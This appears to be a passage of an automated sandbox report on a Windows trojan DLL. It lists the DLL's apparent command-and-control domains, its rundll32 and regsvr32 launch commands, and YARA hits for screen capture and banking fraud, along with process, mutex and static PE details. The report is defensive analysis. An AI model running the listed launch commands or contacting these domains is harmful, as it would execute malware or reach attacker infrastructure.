          Source: loaddll64.exe, 00000000.00000003.402271914.0000027ED3940000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.388635168.0000000002100000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.826743463.0000021DDAD90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.826725063.0000021DDAC4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.388322445.000001F71CC60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gigimas.xyz
          Source: rundll32.exe, 00000004.00000002.825050387.0000021DD91F4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.758857404.0000021DD9255000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.758869560.0000021DD925F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.693664493.0000021DD925F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gigimas.xyz/
          Source: rundll32.exe, 00000004.00000003.432267293.0000021DD9200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gigimas.xyz/92
          Source: rundll32.exe, 00000004.00000002.825050387.0000021DD91F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gigimas.xyz/ic
          Source: rundll32.exe, 00000004.00000003.563913643.0000021DD9221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gigimas.xyz/index.html
          Source: rundll32.exe, 00000004.00000003.759039619.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.759733313.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.694516726.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.629091178.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.693778417.0000021DD923C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gigimas.xyz/index.html)I6
          Source: rundll32.exe, 00000004.00000003.563913643.0000021DD9221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gigimas.xyz/index.htmll
          Source: rundll32.exe, 00000004.00000003.497300012.0000021DD9221000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.497398978.0000021DD9226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gigimas.xyz/index.htmlr
          Source: rundll32.exe, 00000004.00000003.432113341.0000021DD9221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gigimas.xyz/index.htmluH
          Source: rundll32.exe, 00000004.00000002.825032098.0000021DD91ED000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.825050387.0000021DD91F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gigimas.xyz:443/index.html
          Source: rundll32.exe, 00000004.00000002.826725063.0000021DDAC4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gigimas.xyzhttps://reaso.xyz
          Source: loaddll64.exe, 00000000.00000003.402277727.0000027ED3942000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.388644042.0000000002102000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.826756799.0000021DDAD92000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.388329786.000001F71CC62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://http://Mozilla/5.0
          Source: rundll32.exe, 00000004.00000002.826725063.0000021DDAC4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.388322445.000001F71CC60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reaso.xyz
          Source: pzG0rkIchr.dllString found in binary or memory: https://sectigo.com/CPS0
          Source: unknownDNS traffic detected: queries for: gigimas.xyz

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Source: Yara matchFile source: Process Memory Space: loaddll64.exe PID: 492, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5172, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1228, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 400, type: MEMORYSTR

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: Process Memory Space: loaddll64.exe PID: 492, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5172, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1228, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 400, type: MEMORYSTR
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2100 -s 304
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000027ED37137E00_2_0000027ED37137E0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000027ED37156380_2_0000027ED3715638
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000027ED371A9180_2_0000027ED371A918
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000027ED3716DF00_2_0000027ED3716DF0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000027ED3717FD40_2_0000027ED3717FD4
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000027ED3713CD80_2_0000027ED3713CD8
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000027ED37131C00_2_0000027ED37131C0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000027ED37134A40_2_0000027ED37134A4
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000027ED3719D6C0_2_0000027ED3719D6C
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000027ED37145400_2_0000027ED3714540
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000027ED371204C0_2_0000027ED371204C
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C076D500_2_00007FF88C076D50
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C0758400_2_00007FF88C075840
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C0715200_2_00007FF88C071520
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C088D500_2_00007FF88C088D50
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C090D700_2_00007FF88C090D70
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C07F9640_2_00007FF88C07F964
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C08B9B00_2_00007FF88C08B9B0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C0875E00_2_00007FF88C0875E0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C081E140_2_00007FF88C081E14
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C08F2900_2_00007FF88C08F290
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C0742A00_2_00007FF88C0742A0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C0776E00_2_00007FF88C0776E0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C071B100_2_00007FF88C071B10
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C08B3700_2_00007FF88C08B370
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C079BA00_2_00007FF88C079BA0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C0783C00_2_00007FF88C0783C0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C0868080_2_00007FF88C086808
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C0768200_2_00007FF88C076820
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C074C800_2_00007FF88C074C80
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C07DCAC0_2_00007FF88C07DCAC
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C0790B00_2_00007FF88C0790B0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C075CC00_2_00007FF88C075CC0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C08F8F00_2_00007FF88C08F8F0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C0898F00_2_00007FF88C0898F0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_003D37E03_2_003D37E0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_003D56383_2_003D5638
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_003DA9183_2_003DA918
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_003D9D6C3_2_003D9D6C
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_003D204C3_2_003D204C
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_003D45403_2_003D4540
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_003D34A43_2_003D34A4
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_003D6DF03_2_003D6DF0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_003D3CD83_2_003D3CD8
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_003D7FD43_2_003D7FD4
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_003D31C03_2_003D31C0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C076D503_2_00007FF88C076D50
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C0758403_2_00007FF88C075840
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C0715203_2_00007FF88C071520
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C088D503_2_00007FF88C088D50
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C090D703_2_00007FF88C090D70
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C07F9643_2_00007FF88C07F964
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C08B9B03_2_00007FF88C08B9B0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C0875E03_2_00007FF88C0875E0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C081E143_2_00007FF88C081E14
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C08F2903_2_00007FF88C08F290
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C0742A03_2_00007FF88C0742A0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C0776E03_2_00007FF88C0776E0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C071B103_2_00007FF88C071B10
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C08B3703_2_00007FF88C08B370
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C079BA03_2_00007FF88C079BA0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C0783C03_2_00007FF88C0783C0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C0868083_2_00007FF88C086808
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C0768203_2_00007FF88C076820
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C074C803_2_00007FF88C074C80
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C07DCAC3_2_00007FF88C07DCAC
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C0790B03_2_00007FF88C0790B0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C075CC03_2_00007FF88C075CC0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C08F8F03_2_00007FF88C08F8F0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C0898F03_2_00007FF88C0898F0
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000021DD93337E04_2_0000021DD93337E0
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000021DD9333CD84_2_0000021DD9333CD8
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000021DD93331C04_2_0000021DD93331C0
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000021DD93356384_2_0000021DD9335638
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000021DD9339D6C4_2_0000021DD9339D6C
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000021DD93334A44_2_0000021DD93334A4
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000021DD9336DF04_2_0000021DD9336DF0
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000021DD9337FD44_2_0000021DD9337FD4
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000021DD933A9184_2_0000021DD933A918
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000021DD93345404_2_0000021DD9334540
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000021DD933204C4_2_0000021DD933204C
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001F71CC037E05_2_000001F71CC037E0
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001F71CC03CD85_2_000001F71CC03CD8
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001F71CC06DF05_2_000001F71CC06DF0
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001F71CC034A45_2_000001F71CC034A4
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001F71CC031C05_2_000001F71CC031C0
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001F71CC07FD45_2_000001F71CC07FD4
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001F71CC09D6C5_2_000001F71CC09D6C
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001F71CC0A9185_2_000001F71CC0A918
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001F71CC056385_2_000001F71CC05638
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001F71CC045405_2_000001F71CC04540
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001F71CC0204C5_2_000001F71CC0204C
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C0715206_2_00007FF88C071520
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C088D506_2_00007FF88C088D50
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C076D506_2_00007FF88C076D50
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C090D706_2_00007FF88C090D70
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C07F9646_2_00007FF88C07F964
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C08B9B06_2_00007FF88C08B9B0
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C0875E06_2_00007FF88C0875E0
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C081E146_2_00007FF88C081E14
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C08F2906_2_00007FF88C08F290
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C0742A06_2_00007FF88C0742A0
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C0776E06_2_00007FF88C0776E0
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C071B106_2_00007FF88C071B10
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C08B3706_2_00007FF88C08B370
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C079BA06_2_00007FF88C079BA0
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C0783C06_2_00007FF88C0783C0
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C0868086_2_00007FF88C086808
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C0768206_2_00007FF88C076820
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C0758406_2_00007FF88C075840
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C074C806_2_00007FF88C074C80
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C07DCAC6_2_00007FF88C07DCAC
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C0790B06_2_00007FF88C0790B0
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C075CC06_2_00007FF88C075CC0
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C08F8F06_2_00007FF88C08F8F0
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C0898F06_2_00007FF88C0898F0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000027ED371A0AC CreateFileW,NtQueryDirectoryFile,0_2_0000027ED371A0AC
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_003DA0AC CreateFileW,NtQueryDirectoryFile,3_2_003DA0AC
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000021DD933A0AC CreateFileW,NtQueryDirectoryFile,4_2_0000021DD933A0AC
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001F71CC0A0AC CreateFileW,NtQueryDirectoryFile,5_2_000001F71CC0A0AC
          Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
          Source: pzG0rkIchr.dllReversingLabs: Detection: 73%
          Source: pzG0rkIchr.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\pzG0rkIchr.dll"
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\pzG0rkIchr.dll
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,DllRegisterServer
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,ItsnPq5v
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,QlqYo259k
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2100 -s 304
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1308 -s 304
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2100 -s 304
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1308 -s 304
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1Jump to behavior
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\pzG0rkIchr.dllJump to behavior
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,DllRegisterServerJump to behavior
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,ItsnPq5vJump to behavior
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,QlqYo259kJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1Jump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2100 -s 304Jump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1308 -s 304Jump to behavior
          Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER8047.tmpJump to behavior
          Source: classification engineClassification label: mal84.troj.evad.winDLL@22/8@7/1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5284:120:WilError_01
          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1308
          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2100
          Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ManagerMui
          Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: pzG0rkIchr.dllStatic PE information: Image base 0x180000000 > 0x60000000
          Source: pzG0rkIchr.dllStatic PE information: certificate valid
          Source: pzG0rkIchr.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
          Source: pzG0rkIchr.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: UxTheme.pdb source: WerFault.exe, 0000000B.00000003.395877568.000001716E477000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.396307800.000001716E477000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396853459.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396775988.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: gdi32.pdb source: WerFault.exe, 0000000B.00000003.396163566.000001716E474000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396822650.000001DFB5E14000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kernelbase.pdb0 source: WerFault.exe, 0000000B.00000003.392399774.000001716D896000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.390485617.000001DFB52D7000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.392399063.000001DFB52D7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: bcryptprimitives.pdb8 source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000B.00000003.395877568.000001716E477000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.396307800.000001716E477000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396853459.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396775988.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rpcrt4.pdb source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: dwmapi.pdb: source: WerFault.exe, 0000000C.00000003.396853459.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396775988.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: se.pdb\ source: WerFault.exe, 0000000C.00000002.404139284.000001DFB33E2000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kernelbase.pdb8 source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ucrtbase.pdb8 source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: shcore.pdb8 source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: combase.pdb8 source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: win32u.pdb8 source: WerFault.exe, 0000000B.00000003.396163566.000001716E474000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396822650.000001DFB5E14000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: se.pdb( source: WerFault.exe, 0000000B.00000002.404499737.000001716B9D2000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: oleaut32.pdb6 source: WerFault.exe, 0000000C.00000003.396853459.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396775988.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: UxTheme.pdb" source: WerFault.exe, 0000000C.00000003.396853459.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396775988.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msctf.pdb source: WerFault.exe, 0000000B.00000003.395877568.000001716E477000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.396307800.000001716E477000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396853459.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396775988.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: gdi32full.pdb8 source: WerFault.exe, 0000000B.00000003.396163566.000001716E474000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396822650.000001DFB5E14000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
